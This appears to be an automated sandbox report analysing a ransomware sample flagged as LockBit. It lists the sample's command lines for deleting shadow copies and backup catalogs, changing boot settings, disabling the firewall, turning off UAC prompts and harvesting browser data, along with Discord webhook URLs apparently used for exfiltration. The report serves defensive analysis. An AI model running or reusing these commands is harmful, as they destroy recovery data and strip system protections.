                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /fJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.500989414.0000000000D00000.00000002.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506164517.0000000000FD0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.500989414.0000000000D00000.00000002.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506164517.0000000000FD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.500989414.0000000000D00000.00000002.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506164517.0000000000FD0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: 53c0505a_by_Libranalysis.exe, 00000000.00000002.500989414.0000000000D00000.00000002.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506164517.0000000000FD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeCode function: 0_2_00405573 GetVersionExW,GetVersionExW,0_2_00405573

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Deletes the backup plan of WindowsShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quietJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin.exe delete catalog -quiet
                      Modifies the windows firewallShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes
                      Uses netsh to modify the Windows network and firewall settingsShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes

                      Stealing of Sensitive Information:

                      barindex
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FIRSTR~1.H$Jump to behavior

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1Startup Items1Startup Items1Disable or Modify Tools2OS Credential Dumping1File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationInhibit System Recovery1
                      Default AccountsScripting1Scheduled Task/Job1Process Injection12Scripting1Input Capture1System Information Discovery13Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsNative API1Registry Run Keys / Startup Folder12Scheduled Task/Job1File Deletion2Security Account ManagerQuery Registry1SMB/Windows Admin SharesInput Capture1Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsCommand and Scripting Interpreter1Logon Script (Mac)Registry Run Keys / Startup Folder12Masquerading111NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsScheduled Task/Job1Network Logon ScriptNetwork Logon ScriptModify Registry1LSA SecretsVirtualization/Sandbox Evasion3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion3Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 414396 Sample: 53c0505a_by_Libranalysis Startdate: 14/05/2021 Architecture: WINDOWS Score: 100 58 Sigma detected: WannaCry Ransomware 2->58 60 Multi AV Scanner detection for dropped file 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 5 other signatures 2->64 7 53c0505a_by_Libranalysis.exe 10 2->7         started        10 53c0505a_by_Libranalysis.exe 2->10         started        12 wbengine.exe 2->12         started        15 2 other processes 2->15 process3 file4 48 C:\Users\user\AppData\Local\...\aescrypt.exe, PE32 7->48 dropped 50 C:\Users\user\AppData\Local\Temp\...\19C0.bat, ASCII 7->50 dropped 17 cmd.exe 6 7->17         started        21 conhost.exe 7->21         started        52 C:\Users\user\AppData\Local\...\aescrypt.exe, PE32 10->52 dropped 54 C:\Users\user\AppData\Local\Temp\...\539C.bat, ASCII 10->54 dropped 23 cmd.exe 10->23         started        25 conhost.exe 10->25         started        78 Creates files inside the volume driver (system volume information) 12->78 signatures5 process6 file7 44 C:\Users\...\53c0505a_by_Libranalysis.exe, PE32 17->44 dropped 46 53c0505a_by_Libran...exe:Zone.Identifier, ASCII 17->46 dropped 66 May disable shadow drive data (uses vssadmin) 17->66 68 Uses cmd line tools excessively to alter registry or file data 17->68 70 Deletes shadow drive data (may be related to ransomware) 17->70 76 4 other signatures 17->76 27 netsh.exe 17->27         started        30 bcdedit.exe 7 1 17->30         started        32 bcdedit.exe 7 1 17->32         started        40 11 other processes 17->40 72 Uses bcdedit to modify the Windows boot settings 23->72 74 Deletes the backup plan of Windows 23->74 34 WMIC.exe 23->34         started        36 vssadmin.exe 23->36         started        38 bcdedit.exe 23->38         started        42 3 other processes 23->42 signatures8 process9 dnsIp10 56 192.168.2.1 unknown unknown 27->56

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      53c0505a_by_Libranalysis.exe42%VirustotalBrowse
                      53c0505a_by_Libranalysis.exe47%ReversingLabsWin32.Ransomware.LockBit

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exe21%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exe21%ReversingLabsWin32.Packed.Generic
                      C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exe21%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exe21%ReversingLabsWin32.Packed.Generic
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe47%ReversingLabsWin32.Ransomware.LockBit

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://somelink.com/something.html0%VirustotalBrowse
                      http://somelink.com/something.html0%Avira URL Cloudsafe
                      https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe0%Avira URL Cloudsafe
                      https://discord.com/api/webhooks/818640164577738752/0%Avira URL Cloudsafe
                      http://canarytokens.com/images/static/feedback/m0jawrijfonu4hrwf5oy4955s/index.html1%VirustotalBrowse
                      http://canarytokens.com/images/static/feedback/m0jawrijfonu4hrwf5oy4955s/index.html0%Avira URL Cloudsafe
                      https://discord.gg/E8dgPKsmrb0%Avira URL Cloudsafe
                      https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-0%Avira URL Cloudsafe
                      https://discord.com/0%URL Reputationsafe
                      https://discord.com/0%URL Reputationsafe
                      https://discord.com/0%URL Reputationsafe
                      https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Ox0%Avira URL Cloudsafe
                      http://somelink.com/somefile.zip0%Avira URL Cloudsafe
                      https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-2LnuD0%Avira URL Cloudsafe
                      https://discord.com/api(0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://somelink.com/something.html53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://api.ipify.org53c0505a_by_Libranalysis.exe, 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpfalse
                        		high
                        https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENevssadmin.exe, 0000001C.00000002.276824300.000001EB8F298000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://discord.com/api/webhooks/818640164577738752/vssadmin.exe, 0000001C.00000002.276846507.000001EB8F2BD000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://canarytokens.com/images/static/feedback/m0jawrijfonu4hrwf5oy4955s/index.html53c0505a_by_Libranalysis.exe, 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpfalse
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://discord.gg/E8dgPKsmrb53c0505a_by_Libranalysis.exe, 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-WMIC.exe, 00000018.00000002.272554215.00000196AAB80000.00000004.00000040.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://discord.com/vssadmin.exe, 00000006.00000002.240822385.000001F04B370000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4OxWMIC.exe, 0000000E.00000002.253623760.000001B620130000.00000004.00000040.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://i.imgur.com/a2t88yx.png53c0505a_by_Libranalysis.exe, 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmpfalse
                          		high
                          http://somelink.com/somefile.zip53c0505a_by_Libranalysis.exe, 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, 53c0505a_by_Libranalysis.exe, 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://discord.com/api/webhooks/818640164577738752/boGlXBRVGL1FruSl9InrHuMKJClbo4Oxsl3mhENe1z-2LnuDbcdedit.exe, 00000024.00000002.285771846.00000267125E4000.00000004.00000040.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
